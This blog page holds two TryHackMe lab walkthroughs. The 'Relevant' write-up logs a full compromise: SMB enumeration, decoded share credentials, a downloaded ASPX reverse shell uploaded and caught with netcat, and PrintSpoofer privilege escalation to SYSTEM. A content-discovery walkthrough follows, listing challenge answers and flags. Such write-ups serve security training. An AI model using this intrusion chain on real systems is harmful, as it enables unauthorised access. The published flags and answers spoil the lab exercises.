-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label Walkthrough. Show all posts
Showing posts with label Walkthrough. Show all posts
  • TryHackMe relevant penetration testing walkthrough

      

    TryHackMe relevant penetration testing walkthrough



    We have been engaged in a Black-box Penetration Test (IP address may be differ). Our goal is to read the user flag and root flag file on machine. On some of them, you will be required to exploit a Abuse of write permission in Samba service in order to read the flag.

    Some Machines are exploitable instantly but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information, that will help you proceed further into the environment.

    If you are stuck on one of the machines, don't overthink and start pentesting another one.

    When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.



    Pre-Engagement Briefing


    You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.


    Scope of Work


    The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).  The client has asked that you secure two flags (no location provided) as proof of exploitation:

        User.txt
        Root.txt




    Additionally, the client has provided the following scope allowances:


    # Any tools or techniques are permitted in this engagement, however we ask that # you attempt manual exploitation first
    # Locate and note all vulnerabilities found
    # Submit the flags discovered to the dashboard
    # Only the IP address assigned to your machine is in scope
    # Find and report ALL vulnerabilities (yes, there is more than one path to root)

     

    Penetration Testing Methodology


    Reconnaissance

    # Nmap



    Enumeration

    # Smbclient
    # Smbmap



    Exploiting

    # Abuse of write permission in Samba service



    Privilege Escalation

    # Permission in SeImpersonatePrivilege in the system.



    Lets Start, first of all we will Reconnaissance this machine (our target ip may be differ from you ),  lets scan first with nmap..



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo nmap -sC -sV  10.10.220.229                                                                                                                                                  130 ⨯
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 11:22 IST
    Nmap scan report for 10.10.220.229
    Host is up (0.35s latency).
    Not shown: 995 filtered tcp ports (no-response)
    PORT     STATE SERVICE       VERSION
    80/tcp   open  http          Microsoft IIS httpd 10.0
    |_http-server-header: Microsoft-IIS/10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-title: IIS Windows Server
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
    3389/tcp open  ms-wbt-server Microsoft Terminal Services
    |_ssl-date: 2022-03-17T05:53:59+00:00; 0s from scanner time.
    | ssl-cert: Subject: commonName=Relevant
    | Not valid before: 2022-03-16T05:13:22
    |_Not valid after:  2022-09-15T05:13:22
    | rdp-ntlm-info: 
    |   Target_Name: RELEVANT
    |   NetBIOS_Domain_Name: RELEVANT
    |   NetBIOS_Computer_Name: RELEVANT
    |   DNS_Domain_Name: Relevant
    |   DNS_Computer_Name: Relevant
    |   Product_Version: 10.0.14393
    |_  System_Time: 2022-03-17T05:53:20+00:00
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
    | smb2-time: 
    |   date: 2022-03-17T05:53:20
    |_  start_date: 2022-03-17T05:14:03
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   3.1.1: 
    |_    Message signing enabled but not required
    | smb-os-discovery: 
    |   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
    |   Computer name: Relevant
    |   NetBIOS computer name: RELEVANT\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2022-03-16T22:53:20-07:00
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 74.72 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    
    
    
    
    
    

    Then we will enumerating with enum4linux but unfortunately we get nothing from it..but we will keep trying.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ enum4linux 10.10.220.229              
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 17 10:47:18 2022
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 10.10.220.229
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ===================================================== 
    |    Enumerating Workgroup/Domain on 10.10.220.229    |
     ===================================================== 
    [E] Can't find workgroup/domain
    
    
     ============================================= 
    |    Nbtstat Information for 10.10.220.229    |
     ============================================= 
    Looking up status of 10.10.220.229
    No reply from 10.10.220.229
    
     ====================================== 
    |    Session Check on 10.10.220.229    |
     ====================================== 
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
    [E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$                                                                                                                                                                                     1 ⨯
    
    



    you can also enumerate with nmap samba enumeration

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ nmap -p 139,445 -Pn --script smb-enum* 10.10.220.229
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 12:31 IST
    Nmap scan report for 10.10.220.229
    Host is up (0.35s latency).
    
    PORT    STATE SERVICE
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\10.10.220.229\ADMIN$: 
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Remote Admin
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.10.220.229\C$: 
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Default share
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.10.220.229\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: Remote IPC
    |     Anonymous access: <none>
    |     Current user access: READ/WRITE
    |   \\10.10.220.229\nt4wrksv: 
    |     Type: STYPE_DISKTREE
    |     Comment: 
    |     Anonymous access: <none>
    |_    Current user access: READ/WRITE
    | smb-enum-sessions: 
    |_  <nobody>
    
    Nmap done: 1 IP address (1 host up) scanned in 97.83 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    



    Also read-

     

    TryHackMe relevant penetration testing walkthrough

     Click Here



    We are visiting the web service (port 80), we check the source code and robots.txt, it seems that there is nothing useful.



    TryHackMe relevant penetration testing walkthrough


    Network share


    Let’s start with the network share. Listing the shares reveals the presence of nt4wrksv.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$  smbclient -L //10.10.220.229
    Enter WORKGROUP\kali's password: 
    
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
    SMB1 disabled -- no workgroup available
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    


    Connecting to this share reveals a password file:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.220.229/nt4wrksv
    Enter WORKGROUP\root's password: 
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4922488 blocks available
    smb: \> get passwords.txt
    getting file \passwords.txt of size 98 as passwords.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \> #www.hackingtruth.org
    
    
    
    

     

    The file contains base64 encoded credentials, We decode the file and we found credentials.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ ls
    content.txt  passwords.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ cat passwords.txt
    [User Passwords - Encoded]
    Qm9iIC0gIVBAJCRXMHJEITEyMw==
    QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                                                    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    


    For decoding this one, you can use many types of method like online, offline, via terminal, etc. But we will hURL tool. So, first install it and then you can use it. 

     

     

    Also read-

     

    TryHackMe relevant penetration testing walkthrough

     Click Here

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo apt-get install hurl 
    
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      libblkid-dev libglib2.0-dev-bin libmount-dev libpcre16-3 libpcre2-dev libpcre2-posix3 libpcre3-dev libpcre32-3 libpcrecpp0v5 libselinux1-dev libsepol-dev mypaint-brushes mypaint-data
      mypaint-data-extras uuid-dev
    Use 'sudo apt autoremove' to remove them.
    The following NEW packages will be installed:
      hurl
    0 upgraded, 1 newly installed, 0 to remove and 903 not upgraded.
    Need to get 19.5 kB of archives.
    After this operation, 191 kB of additional disk space will be used.
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 hurl all 2.1-0kali2 [19.5 kB]
    Fetched 19.5 kB in 14s (1,432 B/s)
    Selecting previously unselected package hurl.
    (Reading database ... 431755 files and directories currently installed.)
    Preparing to unpack .../hurl_2.1-0kali2_all.deb ...
    Unpacking hurl (2.1-0kali2) ...
    Setting up hurl (2.1-0kali2) ...
    Processing triggers for kali-menu (2021.4.2) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ hURL -b "Qm9iIC0gIVBAJCRXMHJEITEyMw=="
    
    Original string       :: Qm9iIC0gIVBAJCRXMHJEITEyMw==                                                                                                                                       
    base64 DEcoded string :: Bob - !P@$$W0rD!123
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ hURL -b "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk"
    
    Original string       :: QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                           
    base64 DEcoded string :: Bill - Juw4nnaM4n420696969!$$$
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d            
    Bob - !P@$$W0rD!123                                                                                                                                                                         ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ #www.kumaratuljaiswal.in    #www.hackingtruth.in
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
    Bill - Juw4nnaM4n420696969!$$$                                                                                                                                                              ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$                          
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d;echo""
    Bill - Juw4nnaM4n420696969!$$$
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d;echo""            
    Bob - !P@$$W0rD!123
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    
    

    Is an hour of use of smbmap with credentials found. We view can writing in share “nt4wrksv“.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ smbmap -H 10.10.220.229 -u bob -p '!P@$$W0rD!123'
    [+] IP: 10.10.220.229:445       Name: 10.10.220.229                                     
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            C$                                                      NO ACCESS       Default share
            IPC$                                                    READ ONLY       Remote IPC
            nt4wrksv                                                READ, WRITE
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    
    


    Also read-

     

     

    TryHackMe relevant penetration testing walkthrough

     Click Here

     

     

     

    We are testing access the directory in different webservice, we enumerate of the correct SAMBA webservice in running port 49663.



    TryHackMe relevant penetration testing walkthrough



    Exploiting


    We upload a “shell.aspx“, this is a webshell for execute commands from browser.

    Click Here for Shell...


    But first download shell.aspx


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
    [sudo] password for hackerboy: 
    --2022-03-18 12:33:57--  https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
    Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8003::154, 2606:50c0:8000::154, 2606:50c0:8001::154, ...
    Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 15968 (16K) [text/plain]
    Saving to: ‘shell.aspx’
    
    shell.aspx                                     100%[====================================================================================================>]  15.59K  --.-KB/s    in 0.002s  
    
    2022-03-18 12:34:04 (9.54 MB/s) - ‘shell.aspx.1’ saved [15968/15968]
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$
    
    
    



    After downloading this shell.aspx, change this IP and port number with your (Attacker) machine IP address.



    TryHackMe relevant penetration testing walkthrough



    Now we can upload this shell in samba network via this command:

    sudo smbclient //10.10.177.40/nt4wrksv -u bob -p


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4951344 blocks available
    smb: \> put shell.aspx
    putting file shell.aspx as \shell.aspx (1.1 kb/s) (average 1.1 kb/s)
    smb: \> 
    



    then we will run this url on browser and get a reverse shell via this command: 


    10.10.162.140:49663/nt4wrksv/shell.aspx (this IP is belong to vulnerable machine)

    then run this command in our terminal

    nc -nvlp 4444


    after connecting reverse shell with your system then we will find user flag, so i searched it in every directory/file and finally i found this...so, i recommend you first find it yourself.


    User-flag


    TryHackMe relevant penetration testing walkthrough


    Privilege Escalation (NT AUTHORITY\SYSTEM) (Root Flag)

    We execute of command “whoami /priv” and we see that we have permission in privilege “SeImpersonatePrivilege” of the system.


    c:\Users\Bob\Desktop>whoami /priv           
    whoami /priv
    
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                Description                               State   
    ============================= ========================================= ========
    SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
    SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
    SeAuditPrivilege              Generate security audits                  Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege       Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
    
    c:\Users\Bob\Desktop> 
     

     

     

    I started to Google the abuse of this privilege in Windows 2016, I found this github that worked for me (after several xD attempts).

     


    PrintSpoofer


    To exploit this impersonation privilege, the standard potato exploit won’t work, and we’ll use a new tool called PrintSpoofer.


    First we will download a PrintSpoofer.exe file for get a administrator power in windows...

    Click Here


    Then we will put PrintSpoofer in samba network..


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4951344 blocks available
    smb: \>
    smb: \> put PrintSpoofer.exe
    putting file PrintSpoofer.exe as \PrintSpoofer.exe (8.7 kb/s) (average 7.1 kb/s)
    smb: \> 
    smb: \> dir
      .                                   D        0  Fri Mar 18 12:52:00 2022
      ..                                  D        0  Fri Mar 18 12:52:00 2022
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
      PrintSpoofer.exe                    A    27136  Fri Mar 18 12:52:02 2022
      shell.aspx                          A    15990  Fri Mar 18 12:38:30 2022
    
                    7735807 blocks of size 4096. 4946925 blocks available
    smb: \> 
    
    
    




    c:\inetpub\wwwroot\nt4wrksv>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of c:\inetpub\wwwroot\nt4wrksv
    
    03/18/2022  12:22 AM    <DIR>          .
    03/18/2022  12:22 AM    <DIR>          ..
    07/25/2020  08:15 AM                98 passwords.txt
    03/18/2022  12:22 AM            27,136 PrintSpoofer.exe
    03/18/2022  12:08 AM            15,990 shell.aspx
                   3 File(s)         43,224 bytes
                   2 Dir(s)  20,228,485,120 bytes free
    
    c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer -i -c cmd
    PrintSpoofer -i -c cmd
    [+] Found privilege: SeImpersonatePrivilege
    [+] Named pipe listening...
    [+] CreateProcessAsUser() OK
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32>               
    
    
    
    
    



    Now, let’s elevate our privileges with printspoofer:


    Root Flag

    C:\Windows\system32>cd /
    cd /
    
    C:\>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\
    
    07/25/2020  08:16 AM    <DIR>           inetpub
    07/25/2020  08:42 AM    <DIR>           Microsoft
    07/16/2016  06:23 AM    <DIR>           PerfLogs
    07/25/2020  08:00 AM    <DIR>           Program Files
    07/25/2020  04:15 PM    <DIR>           Program Files (x86)
    07/25/2020  02:03 PM    <DIR>           Users
    07/25/2020  04:16 PM    <DIR>           Windows
                   0 File(s)              0 bytes
                   7 Dir(s)  20,228,354,048 bytes free
    
    C:\>cd Users
    cd Users
    
    C:\Users>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users
    
    07/25/2020  02:03 PM    <DIR>           .
    07/25/2020  02:03 PM    <DIR>           ..
    07/25/2020  08:05 AM    <DIR>           .NET v4.5
    07/25/2020  08:05 AM    <DIR>           .NET v4.5 Classic
    07/25/2020  10:30 AM    <DIR>           Administrator
    07/25/2020  02:03 PM    <DIR>           Bob
    07/25/2020  07:58 AM    <DIR>           Public
                   0 File(s)              0 bytes
                   7 Dir(s)  20,228,354,048 bytes free
    
    C:\Users>cd Administrator
    cd Administrator
    
    C:\Users\Administrator>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users\Administrator
    
    07/25/2020  10:30 AM    <DIR>           .
    07/25/2020  10:30 AM    <DIR>           ..
    07/25/2020  07:58 AM    <DIR>           Contacts
    07/25/2020  08:24 AM    <DIR>           Desktop
    07/25/2020  07:58 AM    <DIR>           Documents
    07/25/2020  08:39 AM    <DIR>           Downloads
    07/25/2020  07:58 AM    <DIR>           Favorites
    07/25/2020  07:58 AM    <DIR>           Links
    07/25/2020  07:58 AM    <DIR>           Music
    07/25/2020  07:58 AM    <DIR>           Pictures
    07/25/2020  07:58 AM    <DIR>           Saved Games
    07/25/2020  07:58 AM    <DIR>           Searches
    07/25/2020  07:58 AM    <DIR>           Videos
                   0 File(s)              0 bytes
                  13 Dir(s)  20,226,048,000 bytes free
    
    C:\Users\Administrator>cd Desktop
    cd Desktop
    
    C:\Users\Administrator\Desktop>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users\Administrator\Desktop
    
    07/25/2020  08:24 AM    <DIR>           .
    07/25/2020  08:24 AM    <DIR>           ..
    07/25/2020  08:25 AM                35 root.txt
                   1 File(s)             35 bytes
                   2 Dir(s)  20,224,438,272 bytes free
    
    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    THM{1fk5kf469devly1gl320zafgl345pv}
    C:\Users\Administrator\Desktop>
    
    C:\Users\Administrator\Desktop>hackingtruth.org 
    
    
    
    
    
    
    

    TryHackMe relevant penetration testing walkthrough


    Congratulations we got it :-)




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


  • TryHackMe Content Discovery Walkthrough

     

    TryHackMe Content Discovery Walkthrough


    What Is Content Discovery?


    Firstly, we should ask, in the context of web application security, what is content? Content can be many things, a file, video, picture, backup, a website feature. When we talk about content discovery, we're not talking about the obvious things we can see on a website; it's the things that aren't immediately presented to us and that weren't always intended for public access.

    This content could be, for example, pages or portals intended for staff usage, older versions of the website, backup files, configuration files, administration panels, etc.

    There are three main ways of discovering content on a website which we'll cover. Manually, Automated and OSINT (Open-Source Intelligence).

    Start the machine and then move on to the next task.






    1) What is the Content Discovery method that begins with M?

    Ans- Manually



    2) What is the Content Discovery method that begins with A?

    Ans- Automated



    3) What is the Content Discovery method that begins with O?

    Ans- OSINT






    Manual Discovery - Robots.txt


    There are multiple places we can manually check on a website to start discovering more content.



    Robots.txt

    The robots.txt file is a document that tells search engines which pages they are and aren't allowed to show on their search engine results or ban specific search engines from crawling the website altogether. It can be common practice to restrict certain website areas so they aren't displayed in search engine results. These pages may be areas such as administration portals or files meant for the website's customers. This file gives us a great list of locations on the website that the owners don't want us to discover as penetration testers.


    Take a look at the robots.txt file on the Acme IT Support website to see if they have anything they don't want to list: http://MACHINE_IP/robots.txt



    1) What is the directory in the robots.txt that isn't allowed to be viewed by web crawlers?


     

    TryHackMe Content Discovery Walkthrough

     

    Ans- /staff-portal

     

     


    Manual Discovery - Favicon


    Favicon

    The favicon is a small icon displayed in the browser's address bar or tab used for branding a website.


    TryHackMe Content Discovery Walkthrough


    Sometimes when frameworks are used to build a website, a favicon that is part of the installation gets leftover, and if the website developer doesn't replace this with a custom one, this can give us a clue on what framework is in use. OWASP host a database of common framework icons that you can use to check against the targets favicon https://wiki.owasp.org/index.php/OWASP_favicon_database. Once we know the framework stack, we can use external resources to discover more about it (see next section).



    Practical Exercise:


    Open the website https://static-labs.tryhackme.cloud/sites/favicon/ here you'll see a basic website with a note saying "Website coming soon...", if you look at your tabs you'll notice an icon that confirms this site is using a favicon.


    Viewing the page source you'll see line six contains a link to the images/favicon.ico file. 




    TryHackMe Content Discovery Walkthrough



    If you run the following command it will download the favicon and get its md5 hash value which you can then lookup on the
    https://wiki.owasp.org/index.php/OWASP_favicon_database.

     

     

    TryHackMe Content Discovery Walkthrough

     

     
    1) What framework did the favicon belong to?

    HINT- Visit this link https://wiki.owasp.org/index.php/OWASP_favicon_database



    TryHackMe Content Discovery Walkthrough



    Ans- cgiirc

     

     

    Manual Discovery - Sitemap.xml


    Sitemap.xml

    Unlike the robots.txt file, which restricts what search engine crawlers can look at, the sitemap.xml file gives a list of every file the website owner wishes to be listed on a search engine. These can sometimes contain areas of the website that are a bit more difficult to navigate to or even list some old webpages that the current site no longer uses but are still working behind the scenes.


    Take a look at the sitemap.xml file on the Acme IT Support website to see if there's any new content we haven't yet discovered: http://10.10.159.199/sitemap.xml



    1) What is the path of the secret area that can be found in the sitemap.xml file?


    Ans- /s3cr3t-area


     

     

    Manual Discovery - HTTP Headers


    HTTP Headers

    When we make requests to the web server, the server returns various HTTP headers. These headers can sometimes contain useful information such as the webserver software and possibly the programming/scripting language in use. In the below example, we can see the webserver is NGINX version 1.18.0 and runs PHP version 7.4.3. Using this information, we could find vulnerable versions of software being used. Try running the below curl command against the web server, where the -v switch enables verbose mode, which will output the headers (there might be something interesting!).

     

               
    
     
    
            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl http://10.10.159.199 -v
    *   Trying 10.10.159.199:80...
    * Connected to 10.10.159.199 (10.10.159.199) port 80 (#0)
    >  GET / HTTP/1.1
    >  Host: 10.10.159.199
    >  User-Agent: curl/7.74.0
    >  Accept: */*
    > * Mark bundle as not supporting multiuse
    < HTTP/1.1 200 OK
    < Server: nginx/1.18.0 (Ubuntu)
    < Date: Thu, 02 Dec 2021 16:44:21 GMT
    < Content-Type: text/html; charset=UTF-8
    < Transfer-Encoding: chunked
    < Connection: keep-alive
    < X-FLAG: THM{HEADER_FLAG}
    < 
    <!--
    This page is temporary while we work on the new homepage @ /new-home-beta
    -->
    
    

     


    1) What is the flag value from the X-FLAG header?

      
    Ans- THM{HEADER_FLAG}

     

     



    Manual Discovery - Framework Stack

    Framework Stack

    Once you've established the framework of a website, either from the above favicon example or by looking for clues in the page source such as comments, copyright notices or credits, you can then locate the framework's website. From there, we can learn more about the software and other information, possibly leading to more content we can discover.


    Looking at the page source of our Acme IT Support website (http://10.10.159.199), you'll see a comment at the end of every page with a page load time and also a link to the framework's website, which is https://static-labs.tryhackme.cloud/sites/thm-web-framework. Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website.



    1) What is the flag from the framework's administration portal?

     

    TryHackMe Content Discovery Walkthrough


    TryHackMe Content Discovery Walkthrough



    TryHackMe Content Discovery Walkthrough
     

    TryHackMe Content Discovery Walkthrough

     

    Ans- THM{CHANGE_DEFAULT_CREDENTIALS}

     

     

    OSINT - Google Hacking / Dorking


    There are also external resources available that can help in discovering information about your target website; these resources are often referred to as OSINT or (Open-Source Intelligence) as they're freely available tools that collect information:



    Google Hacking / Dorking


    Google hacking / Dorking utilizes Google's advanced search engine features, which allow you to pick out custom content. You can, for instance, pick out results from a certain domain name using the site: filter, for example (site:hackingtruth.in) you can then match this up with certain search terms, say, for example, the word admin (site:hackingtruth.in admin) this then would only return results from the hackingtruth.in website which contain the word admin in its content. You can combine multiple filters as well. Here is an example of more filters you can use:

     

     

    Filter Example Description
    Site site:tryhackme.com returns results only from the specified website address
    inurl inurl:admin returns results that have the specified word in the URL
    filetype filetype:pdf returns results which are a particular file extension
    intitle intitle:admin returns results that contain the specified word in the title

     



    More information about google hacking can be found here: https://en.wikipedia.org/wiki/Google_hacking



    1) What Google dork operator can be used to only show results from a particular site?

    Ans- site:



    OSINT - Wappalyzer


    Wappalyzer

    Wappalyzer (https://www.wappalyzer.com/) is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well.



    1) What online tool can be used to identify what technologies a website is running?

    Ans- Wappalyzer




    OSINT - Wayback Machine


    Wayback Machine

    The Wayback Machine (https://archive.org/web/) is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website.



    1) What is the website address for the Wayback Machine?

    Ans- https://archive.org/web/



    OSINT - GitHub


    GitHub

